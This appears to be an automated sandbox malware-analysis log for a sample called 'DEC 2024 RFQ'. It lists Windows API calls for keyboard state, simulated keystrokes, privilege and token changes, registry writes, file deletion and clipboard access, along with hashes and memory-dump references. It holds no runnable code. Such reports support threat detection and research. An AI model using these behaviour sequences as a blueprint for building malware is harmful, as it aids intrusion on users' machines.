• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: ErrorLast
• String ID:
• API String ID: 1452528299-0
APIs
• Sleep.KERNELBASE(000001F4), ref: 0173B4A1
Memory Dump Source
• Source File: 00000000.00000002.1691628844.0000000001739000.00000040.00000020.00020000.00000000.sdmp, Offset: 01739000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1739000_DEC 2024 RFQ.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
APIs
• Sleep.KERNELBASE(000001F4), ref: 0173B4A1
Memory Dump Source
• Source File: 00000000.00000002.1691628844.0000000001739000.00000040.00000020.00020000.00000000.sdmp, Offset: 01739000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1739000_DEC 2024 RFQ.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
APIs
  • Part of subcall function 00022612: GetWindowLongW.USER32(?,000000EB), ref: 00022623
• DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 000ACB37
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 000ACB95
• GetWindowLongW.USER32(?,000000F0), ref: 000ACBD6
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 000ACC00
• SendMessageW.USER32 ref: 000ACC29
• _wcsncpy.LIBCMT ref: 000ACC95
• GetKeyState.USER32(00000011), ref: 000ACCB6
• GetKeyState.USER32(00000009), ref: 000ACCC3
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 000ACCD9
• GetKeyState.USER32(00000010), ref: 000ACCE3
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 000ACD0C
• SendMessageW.USER32 ref: 000ACD33
• SendMessageW.USER32(?,00001030,?,000AB348), ref: 000ACE37
• ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 000ACE4D
• ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 000ACE60
• SetCapture.USER32(?), ref: 000ACE69
• ClientToScreen.USER32(?,?), ref: 000ACECE
• ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 000ACEDB
• InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 000ACEF5
• ReleaseCapture.USER32 ref: 000ACF00
• GetCursorPos.USER32(?), ref: 000ACF3A
• ScreenToClient.USER32(?,?), ref: 000ACF47
• SendMessageW.USER32(?,00001012,00000000,?), ref: 000ACFA3
• SendMessageW.USER32 ref: 000ACFD1
• SendMessageW.USER32(?,00001111,00000000,?), ref: 000AD00E
• SendMessageW.USER32 ref: 000AD03D
• SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 000AD05E
• SendMessageW.USER32(?,0000110B,00000009,?), ref: 000AD06D
• GetCursorPos.USER32(?), ref: 000AD08D
• ScreenToClient.USER32(?,?), ref: 000AD09A
• GetParent.USER32(?), ref: 000AD0BA
• SendMessageW.USER32(?,00001012,00000000,?), ref: 000AD123
• SendMessageW.USER32 ref: 000AD154
• ClientToScreen.USER32(?,?), ref: 000AD1B2
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 000AD1E2
• SendMessageW.USER32(?,00001111,00000000,?), ref: 000AD20C
• SendMessageW.USER32 ref: 000AD22F
• ClientToScreen.USER32(?,?), ref: 000AD281
• TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 000AD2B5
  • Part of subcall function 000225DB: GetWindowLongW.USER32(?,000000EB), ref: 000225EC
• GetWindowLongW.USER32(?,000000F0), ref: 000AD351
Strings
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
• String ID: @GUI_DRAGID$F
• API String ID: 3977979337-4164748364
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: _memmove$_memset
• String ID: ]$DEFINE$P\$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
• API String ID: 1357608183-996749009
APIs
• GetForegroundWindow.USER32(00000000,?), ref: 000248DF
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0005D665
• IsIconic.USER32(?), ref: 0005D66E
• ShowWindow.USER32(?,00000009), ref: 0005D67B
• SetForegroundWindow.USER32(?), ref: 0005D685
• GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0005D69B
• GetCurrentThreadId.KERNEL32 ref: 0005D6A2
• GetWindowThreadProcessId.USER32(?,00000000), ref: 0005D6AE
• AttachThreadInput.USER32(?,00000000,00000001), ref: 0005D6BF
• AttachThreadInput.USER32(?,00000000,00000001), ref: 0005D6C7
• AttachThreadInput.USER32(00000000,?,00000001), ref: 0005D6CF
• SetForegroundWindow.USER32(?), ref: 0005D6D2
• MapVirtualKeyW.USER32(00000012,00000000), ref: 0005D6E7
• keybd_event.USER32(00000012,00000000), ref: 0005D6F2
• MapVirtualKeyW.USER32(00000012,00000000), ref: 0005D6FC
• keybd_event.USER32(00000012,00000000), ref: 0005D701
• MapVirtualKeyW.USER32(00000012,00000000), ref: 0005D70A
• keybd_event.USER32(00000012,00000000), ref: 0005D70F
• MapVirtualKeyW.USER32(00000012,00000000), ref: 0005D719
• keybd_event.USER32(00000012,00000000), ref: 0005D71E
• SetForegroundWindow.USER32(?), ref: 0005D721
• AttachThreadInput.USER32(?,?,00000000), ref: 0005D748
Strings
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
• String ID: Shell_TrayWnd
• API String ID: 4125248594-2988720461
APIs
  • Part of subcall function 000787E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0007882B
  • Part of subcall function 000787E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00078858
  • Part of subcall function 000787E1: GetLastError.KERNEL32 ref: 00078865
• _memset.LIBCMT ref: 00078353
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 000783A5
• CloseHandle.KERNEL32(?), ref: 000783B6
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 000783CD
• GetProcessWindowStation.USER32 ref: 000783E6
• SetProcessWindowStation.USER32(00000000), ref: 000783F0
• OpenDesktopW.USER32(default,00000000,00000000,|$$), ref: 0007840A
  • Part of subcall function 000781CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00078309), ref: 000781E0
  • Part of subcall function 000781CB: CloseHandle.KERNEL32(?,?,00078309), ref: 000781F2
Strings
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
• String ID: $default$winsta0$|$$
• API String ID: 2063423040-991071530
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 0008C78D
• FindClose.KERNEL32(00000000), ref: 0008C7E1
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0008C806
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0008C81D
• FileTimeToSystemTime.KERNEL32(?,?), ref: 0008C844
• __swprintf.LIBCMT ref: 0008C890
• __swprintf.LIBCMT ref: 0008C8D3
  • Part of subcall function 00027DE1: _memmove.LIBCMT ref: 00027E22
• __swprintf.LIBCMT ref: 0008C927
  • Part of subcall function 00043698: __woutput_l.LIBCMT ref: 000436F1
• __swprintf.LIBCMT ref: 0008C975
  • Part of subcall function 00043698: __flsbuf.LIBCMT ref: 00043713
  • Part of subcall function 00043698: __flsbuf.LIBCMT ref: 0004372B
• __swprintf.LIBCMT ref: 0008C9C4
• __swprintf.LIBCMT ref: 0008CA13
• __swprintf.LIBCMT ref: 0008CA62
Strings
Similarity
• API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
• String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
• API String ID: 3953360268-2428617273
APIs
• FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0008EFB6
• _wcscmp.LIBCMT ref: 0008EFCB
• _wcscmp.LIBCMT ref: 0008EFE2
• GetFileAttributesW.KERNEL32(?), ref: 0008EFF4
• SetFileAttributesW.KERNEL32(?,?), ref: 0008F00E
• FindNextFileW.KERNEL32(00000000,?), ref: 0008F026
• FindClose.KERNEL32(00000000), ref: 0008F031
• FindFirstFileW.KERNEL32(*.*,?), ref: 0008F04D
• _wcscmp.LIBCMT ref: 0008F074
• _wcscmp.LIBCMT ref: 0008F08B
• SetCurrentDirectoryW.KERNEL32(?), ref: 0008F09D
• SetCurrentDirectoryW.KERNEL32(000D8920), ref: 0008F0BB
• FindNextFileW.KERNEL32(00000000,00000010), ref: 0008F0C5
• FindClose.KERNEL32(00000000), ref: 0008F0D2
• FindClose.KERNEL32(00000000), ref: 0008F0E4
Strings
Similarity
• API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
• String ID: *.*
• API String ID: 1803514871-438819550
APIs
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000A0953
• RegCreateKeyExW.ADVAPI32(?,?,00000000,000AF910,00000000,?,00000000,?,?), ref: 000A09C1
• RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 000A0A09
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 000A0A92
• RegCloseKey.ADVAPI32(?), ref: 000A0DB2
• RegCloseKey.ADVAPI32(00000000), ref: 000A0DBF
Strings
Similarity
• API ID: Close$ConnectCreateRegistryValue
• String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
• API String ID: 536824911-966354055
APIs
• FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0008F113
• _wcscmp.LIBCMT ref: 0008F128
• _wcscmp.LIBCMT ref: 0008F13F
  • Part of subcall function 00084385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 000843A0
• FindNextFileW.KERNEL32(00000000,?), ref: 0008F16E
• FindClose.KERNEL32(00000000), ref: 0008F179
• FindFirstFileW.KERNEL32(*.*,?), ref: 0008F195
• _wcscmp.LIBCMT ref: 0008F1BC
• _wcscmp.LIBCMT ref: 0008F1D3
• SetCurrentDirectoryW.KERNEL32(?), ref: 0008F1E5
• SetCurrentDirectoryW.KERNEL32(000D8920), ref: 0008F203
• FindNextFileW.KERNEL32(00000000,00000010), ref: 0008F20D
• FindClose.KERNEL32(00000000), ref: 0008F21A
• FindClose.KERNEL32(00000000), ref: 0008F22C
Strings
Similarity
• API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
• String ID: *.*
• API String ID: 1824444939-438819550
APIs
• GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0008A20F
• __swprintf.LIBCMT ref: 0008A231
• CreateDirectoryW.KERNEL32(?,00000000), ref: 0008A26E
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0008A293
• _memset.LIBCMT ref: 0008A2B2
• _wcsncpy.LIBCMT ref: 0008A2EE
• DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0008A323
• CloseHandle.KERNEL32(00000000), ref: 0008A32E
• RemoveDirectoryW.KERNEL32(?), ref: 0008A337
• CloseHandle.KERNEL32(00000000), ref: 0008A341
Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                      • String ID: :$\$\??\%s
                                                                                                                      • API String ID: 2733774712-3457252023
                                                                                                                      • Opcode ID: 5e98dee262534ea1954c6d94bda606fc4dd107c07de24d217cb27067ce6ccb03
                                                                                                                      • Instruction ID: 4a38e7647a13e92ef9111c6c1acfb70020fdacb6c4d7b2b938bba34877b98c45
                                                                                                                      • Opcode Fuzzy Hash: 5e98dee262534ea1954c6d94bda606fc4dd107c07de24d217cb27067ce6ccb03
                                                                                                                      • Instruction Fuzzy Hash: 693180B2A0010AABEB219FA0DC49FEB37BCFF8A740F1041B6F548D6161E77497448B25
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00078202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0007821E
                                                                                                                        • Part of subcall function 00078202: GetLastError.KERNEL32(?,00077CE2,?,?,?), ref: 00078228
                                                                                                                        • Part of subcall function 00078202: GetProcessHeap.KERNEL32(00000008,?,?,00077CE2,?,?,?), ref: 00078237
                                                                                                                        • Part of subcall function 00078202: HeapAlloc.KERNEL32(00000000,?,00077CE2,?,?,?), ref: 0007823E
                                                                                                                        • Part of subcall function 00078202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00078255
                                                                                                                        • Part of subcall function 0007829F: GetProcessHeap.KERNEL32(00000008,00077CF8,00000000,00000000,?,00077CF8,?), ref: 000782AB
                                                                                                                        • Part of subcall function 0007829F: HeapAlloc.KERNEL32(00000000,?,00077CF8,?), ref: 000782B2
                                                                                                                        • Part of subcall function 0007829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00077CF8,?), ref: 000782C3
                                                                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00077D13
                                                                                                                      • _memset.LIBCMT ref: 00077D28
                                                                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00077D47
                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00077D58
                                                                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00077D95
                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00077DB1
                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00077DCE
                                                                                                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00077DDD
                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00077DE4
                                                                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00077E05
                                                                                                                      • CopySid.ADVAPI32(00000000), ref: 00077E0C
                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00077E3D
                                                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00077E63
                                                                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00077E77
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3996160137-0
                                                                                                                      • Opcode ID: 8076a299490017258e9dc849de0897ee0084a83123bafd44f96c9ad3a8091db2
                                                                                                                      • Instruction ID: c8b8b0d8a1356fcd9c69e89598e76b89f6616e033de2ee2e3dfd72f445da1deb
                                                                                                                      • Opcode Fuzzy Hash: 8076a299490017258e9dc849de0897ee0084a83123bafd44f96c9ad3a8091db2
                                                                                                                      • Instruction Fuzzy Hash: D4613A71D0450AAFDF10DFA4DC44EEEBBB9FF09340F048169E919A7291DB399A05CB64
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$p9dowp0dowp2dowp0dowp0dowp0dowp0dowp6dowpadowp0dowp0dowp6dowp8dowp0dowp0dowp0dowp0dowp0dowp0dowp0dowp8dowp6dowpadowp4dowp0dowp8dow
                                                                                                                      • API String ID: 0-2157299511
                                                                                                                      • Opcode ID: e946cca210fc94b79266a9df62057804ca3bcc8f5485f4f0ce336f0d6857ede9
                                                                                                                      • Instruction ID: 09f6bf7277f4c21d09d45c0b3d557d73a5c63daa99b815a8e3a5564c0c1569ad
                                                                                                                      • Opcode Fuzzy Hash: e946cca210fc94b79266a9df62057804ca3bcc8f5485f4f0ce336f0d6857ede9
                                                                                                                      • Instruction Fuzzy Hash: 7B725D75E00619DBDB25CF58C8807EEB7F9BF48310F14C16AE809EB291DB759A81CB94
                                                                                                                      APIs
                                                                                                                      • GetKeyboardState.USER32(?), ref: 00080097
                                                                                                                      • SetKeyboardState.USER32(?), ref: 00080102
                                                                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00080122
                                                                                                                      • GetKeyState.USER32(000000A0), ref: 00080139
                                                                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00080168
                                                                                                                      • GetKeyState.USER32(000000A1), ref: 00080179
                                                                                                                      • GetAsyncKeyState.USER32(00000011), ref: 000801A5
                                                                                                                      • GetKeyState.USER32(00000011), ref: 000801B3
                                                                                                                      • GetAsyncKeyState.USER32(00000012), ref: 000801DC
                                                                                                                      • GetKeyState.USER32(00000012), ref: 000801EA
                                                                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00080213
                                                                                                                      • GetKeyState.USER32(0000005B), ref: 00080221
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: State$Async$Keyboard
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 541375521-0
                                                                                                                      • Opcode ID: 26efe4285debbdf49ef9ee242acd2dd64c11e45062a781a55cd1aef6d355aaec
                                                                                                                      • Instruction ID: 63fb10b27121bdfa03c011c14249cec391afa417dba4f6125806bfd2e0fdff48
                                                                                                                      • Opcode Fuzzy Hash: 26efe4285debbdf49ef9ee242acd2dd64c11e45062a781a55cd1aef6d355aaec
                                                                                                                      • Instruction Fuzzy Hash: 64519A309047882DFFB5FBB088557EABFF4AF11380F08459995C6565C3DAA49B8CCB61
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 000A0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0009FDAD,?,?), ref: 000A0E31
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000A04AC
                                                                                                                        • Part of subcall function 00029837: __itow.LIBCMT ref: 00029862
                                                                                                                        • Part of subcall function 00029837: __swprintf.LIBCMT ref: 000298AC
                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 000A054B
                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 000A05E3
                                                                                                                      • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 000A0822
                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 000A082F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1240663315-0
                                                                                                                      • Opcode ID: 9829a997e605f6e07fa8b3afab394372836a4a64c8f4c6a583c45bdc24fe7522
                                                                                                                      • Instruction ID: c576fb8d698d18157b8745cd0e492da82905c0cab1e726ae9aad74600c80653f
                                                                                                                      • Opcode Fuzzy Hash: 9829a997e605f6e07fa8b3afab394372836a4a64c8f4c6a583c45bdc24fe7522
                                                                                                                      • Instruction Fuzzy Hash: 8CE17F71604215AFCB14DF64C895D6EBBE4FF8A714F04896DF44ADB262DA30ED01CB91
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1737998785-0
                                                                                                                      • Opcode ID: baa1c140bd65918c65852418962cecf3b364c8a43d24077d825d9c9a845fd748
                                                                                                                      • Instruction ID: b8e1e2ab90f68ae002730d7d1579edb3afdc9f50ff2c4647a0fb38410a6199ed
                                                                                                                      • Opcode Fuzzy Hash: baa1c140bd65918c65852418962cecf3b364c8a43d24077d825d9c9a845fd748
                                                                                                                      • Instruction Fuzzy Hash: CA219135600A119FEB14AF64EC59F7D7BA8FF05711F14802AF9469B2B2DB38AC01DB54
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00024750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00024743,?,?,000237AE,?), ref: 00024770
                                                                                                                        • Part of subcall function 00084A31: GetFileAttributesW.KERNEL32(?,0008370B), ref: 00084A32
                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 000838A3
                                                                                                                      • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0008394B
                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 0008395E
                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0008397B
                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0008399D
                                                                                                                      • FindClose.KERNEL32(00000000,?,?,?,?), ref: 000839B9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                                                                      • String ID: \*.*
                                                                                                                      • API String ID: 4002782344-1173974218
                                                                                                                      • Opcode ID: f23fcfbe0399724406e3e190d3ad3b36d645185d4146edbaa9791b3f4110ee48
                                                                                                                      • Instruction ID: 2b19afccc00220d7617ffb42162cb44e8d0f455e98dff7a859f648cbfebbf1be
                                                                                                                      • Opcode Fuzzy Hash: f23fcfbe0399724406e3e190d3ad3b36d645185d4146edbaa9791b3f4110ee48
                                                                                                                      • Instruction Fuzzy Hash: 9A51AF3180515DAACF15FFA0E9929FDB7B8AF51300F600069E486B7192EF316F09CB61
